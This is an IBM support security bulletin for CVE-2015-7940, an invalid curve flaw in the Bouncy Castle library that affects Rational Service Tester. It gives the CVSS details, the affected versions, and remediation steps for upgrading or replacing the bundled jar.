IBM Support

Security Bulletin: A vulnerbility in Bouncy Castle affects Rational Service Tester (CVE-2015-7940 )

Created by Kevin Mooney on

Security Bulletin


Summary

Bouncy Castle could allow a remote attacker to obtain sensitive information, caused by an invalid curve attack. An attacker could exploit this vulnerability to extract private keys used in elliptic curve crytpography and obtain sensitive information.

Vulnerability Details

CVEID: CVE-2015-7940
DESCRIPTION:
Bouncy Castle could allow a remote attacker to obtain sensitive information. An attacker could exploit this vulnerability using an invalid curve attack to extract private keys used in elliptic curve cryptography and obtain sensitive information.
CVSS Base Score: 5.3
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/107739 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

Affected Products and Versions

RST versions 8.2.*, 8.3.*, 8.5.*, 8.6.*, 8.7.*.

Remediation/Fixes

It is strongly recommended to upgrade to RPT version 9.0.

For older releases, you can alternatively update the Bouncy Castle library manually:


1) Download the bouncy castle version 1.5.3 ( the jar can be downloaded here https://www.bouncycastle.org/download/jce-jdk13-154.jar ).
2) Locate the previous bouncy castle librarie delivered, this will be typically at the following path:
INSTALLATION_DIRECTORY/IBM_SHARED_PLUGINS/plugins/com.ibm.rational.ttt.common.models.core_plugin_version/lib/approvedbouncy
For example::
C:\Program Files\IBM\IBMIMSharedRPT8702\plugins\com.ibm.rational.ttt.common.models.core_8.5.210.v20150622_1524\lib\approvedbouncy
for RPT v8.7.0.2.
3) Rename the bouncy castle jar version 1.5.3 downloaded to the name of the previous delivered jar ( jce-jdk13-134.jar ).
4) Replace the old jar with the new one.

Workarounds and Mitigations

None.

Get Notified about Future Security Bulletins

References

Off

*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

Disclaimer

Review the IBM security bulletin disclaimer and definitions regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.

[{"Product":{"code":"SSNKWF","label":"IBM Rational Service Tester for SOA Quality"},"Business Unit":{"code":"BU053","label":"Cloud & Data Platform"},"Component":"Test Execution","Platform":[{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"}],"Version":"8.2;8.2.0.1;8.2.0.2;8.2.0.3;8.2.0.4;8.2.0.5;8.2.0.6;8.2.1;8.2.1.1;8.2.1.2;8.2.1.3;8.2.1.4;8.2.1.5;8.3;8.3.0.1;8.3.0.2;8.3.0.3;8.5;8.5.0.1;8.5.0.2;8.5.1;8.5.1.1;8.5.1.2;8.5.1.3;8.6;8.6.0.1;8.6.0.2;8.7;8.7.0.1;8.7.0.2;8.7.1;8.7.1.1","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}]

Document Information

Modified date:
17 June 2018

UID

swg21978823